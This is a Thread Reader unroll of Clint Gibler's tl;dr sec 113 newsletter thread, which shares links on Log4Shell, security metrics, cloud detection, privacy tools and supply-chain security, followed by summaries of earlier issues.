📚 tl;dr sec 113

* Log4Shell resources
* @JubbaOnJeans, @yashvi3r Security metrics
* How @netflix scales cloud detections
* @orange_8361 CTF challenges
* @prince_of_pasta Least privilege IAM
* Free @falco_org 101 course
* and more!

tldrsec.com/blog/tldr-sec-…
@JubbaOnJeans @yashvi3r @netflix @orange_8361 @prince_of_pasta @falco_org 📢 Sponsor: @goteleport Teleport 8 delivers industry best practices for remotely accessing Windows and Linux servers, databases, Kubernetes clusters, and internal web applications via a single secure, highly available endpoint. Learn more goteleport.com/blog/rdp-acces…
@JubbaOnJeans @yashvi3r @netflix @orange_8361 @prince_of_pasta @falco_org @goteleport Boring AppSec: an awesome #AppSec newsletter by JubbaOnJeansNewsletter
boringappsec.substack.com

@mattomata Zero-friction “keyless signing” with Github Actions
chainguard.dev/posts/2021-12-…

Building Trust in the Software Supply Chain w/ Binary Transparency
binary.transparency.dev
@JubbaOnJeans @yashvi3r @netflix @orange_8361 @prince_of_pasta @falco_org @goteleport @mattomata @yevgenypats Enforce #privacy & security on Windows/MacOS
Privacy.Sexy

@jdbiersdorfer How to Use Your Phone’s Privacy Tools
nytimes.com/2021/12/08/tec…

Protect your browsing history from Verizon
theverge.com/2021/12/5/2281…

@signalapp video calls support 40 people
signal.org/blog/how-to-bu…
@JubbaOnJeans @yashvi3r @netflix @orange_8361 @prince_of_pasta @falco_org @goteleport @mattomata @yevgenypats @jdbiersdorfer @signalapp @yakczar Easily and securely send files and folders from one computer to another
github.com/schollz/croc

@danirukun Integrating Emacs with Siri Shortcuts
danpetrov.xyz/macos/emacs/li…

Ok, now a bunch of #Log4Shell resources 👇

I know, I wish I could avoid it too
@JubbaOnJeans @yashvi3r @netflix @orange_8361 @prince_of_pasta @falco_org @goteleport @mattomata @yevgenypats @jdbiersdorfer @signalapp @yakczar @DaniruKun @christophetd @Rayhan0x01 @cybereason @NCCGroupInfosec @DanielMiessler @kurtseifried @ThinkstCanary @lapt0r @LewisArdern @r2cdev @mubix If you liked this thread, check out tl;dr sec, a weekly newsletter I send out with:

📚 Summaries of great security talks
🛠️ The latest tools and useful blog posts
🧪 My various research projects

Thanks for reading, have a great day! 😎

tldrsec.com

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Clint Gibler

Clint Gibler Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @clintgibler

28 Oct
📚 tl;dr sec 107
* @rung Attacking and securing CI/CD pipelines
* @xntrik Threat modeling in HCL
* @NCCGroupInfosec Cracking random number generators w/ML
* @kottireethi GitHub Actions security best practices
* @pdnuclei Easily validate leaked API tokens

tldrsec.com/blog/tldr-sec-…
@rung @xntrik @NCCGroupInfosec @kottireethi @pdnuclei 📢 Sponsor: Join @Tenable, @awscloud, @techmahindracsr, & more at #Accurics Code to Cloud Security Summit on Wed. Nov 10 @ 8:30am PST. If you’re in the US, register by Fri. to receive a FREE snack box. Preparing for tomorrow’s security challenges today. hopin.com/events/executi…
@rung @xntrik @NCCGroupInfosec @kottireethi @pdnuclei @tenable @awscloud @techmahindracsr Tool for secret management at @elastic
github.com/elastic/harp

Repo of Google's security advisories and accompanying PoCs
github.com/google/securit…

@xntrik: Document your threat models in HCL
github.com/xntrik/hcltm

@daniel_bilar With 👆, you can now lint your TMs with Semgrep
Read 10 tweets
14 Oct
📚 tl;dr sec 105
* #DevSecOps - @NIST on microservices + service mesh
* @ErmeticSec Defending S3 from ransomware
* @falco_org labs
* Risk-Based Security Decision Making at @netflix
* @brutelogic XSS exercises
* @trailofbits osquery + macOS EndpointSec

tldrsec.com/blog/tldr-sec-…
@NIST @ErmeticSec @falco_org @netflix @brutelogic @trailofbits 📢 Sponsor: Learn how “Detection-as-Code” is changing how security teams write, test and harden detections. blog.runpanther.io/detections-as-…
@NIST @ErmeticSec @falco_org @netflix @brutelogic @trailofbits Risk-Based Security Decision Making at @netflix
eventbrite.com/e/risk-based-s…

@ztgrace A tool for detecting default and backdoor creds
github.com/ztgrace/change…

@omer_gil Bypassing required reviews using GitHub Actions
medium.com/cider-sec/bypa…
Read 9 tweets
7 Oct
📚 tl;dr sec 104
* New Phrack
* @hakluke, @farah_hawaa 10 often missed web vulns
* @_fel1x C/C++ semantic search tool
* @black2fan, @s1r1u5_ Finding prototype pollution at scale
* @r2cdev Securing your GitHub Actions
* @alex_dhondt Exploiting drones

tldrsec.com/blog/tldr-sec-…
@hakluke @Farah_Hawaa @_fel1x @Black2Fan @S1r1u5_ @r2cdev @alex_dhondt 📢 Sponsor: The DevSecGuide to Infrastructure as Code:
🔬 Research on the state of IaC security
🦋 Practical steps for embracing a DevSecOps culture
🔐 Tips for embedding security throughout the DevOps lifecycle
➡️ Download for free from @bridgecrewio
bridgecrew.io/resource/the-d…
Read 9 tweets
28 Jan
📚 tl;dr sec 68
* >5K subscribers! 🤯
* How AWS secures Lambda
* @DanielMiessler primer on @TomNomNom's recon tools
* @infosec_au Blind SSRF chains
* @RachelTobac InfoSec sea shanty
* @bradgeesaman Creating least priv custom roles in GCP

tldrsec.com/blog/tldr-sec-…
@DanielMiessler @TomNomNom @infosec_au @RachelTobac @bradgeesaman 📢 Sponsor: Go beyond the network - detect and block malicious actors, not just malicious IPs, with @SqreenIO’s RASP. Schedule your demo today sqreen.com/rasp
@DanielMiessler @TomNomNom @infosec_au @RachelTobac @bradgeesaman @SqreenIO @cryptogangsta Bypassing Signature Checks with Electron
parsiya.net/blog/2021-01-0…

SANS Virtual Summits FREE in 2021
sans.org/blog/sans-virt…

@IncludeSecurity Writing custom static analysis rules in Brakeman and Semgrep
blog.includesecurity.com/2021/01/ruby-s…
Read 8 tweets
8 Jan 20
📚tl;dr sec 19
* @shehackspurple & @j_opdenakker on getting into security
* Google's BeyondProd & code provenance (thx @MayaKaczorowski)
* Cloud, API, and file access bug security tools

... and I've got something big planned next week, stay tuned 🤫

tldrsec.com/blog/tldr-sec-…
Static analysis tools to find security issues in:

🌎Terraform scripts:
* github.com/liamg/tfsec
* github.com/bridgecrewio/c…
* github.com/cesar-rodrigue…

☁️CloudFormation templates:
* github.com/Skyscanner/cfr…
* github.com/stelligent/cfn…
Other #security tools:

Docker container that wraps 7 other #AWS security tools:
github.com/z0ph/aws-secur…

Automatic API attack tool that takes API specs as input:
github.com/imperva/automa…

Finding file access bugs:
github.com/google/path-au…
Read 4 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(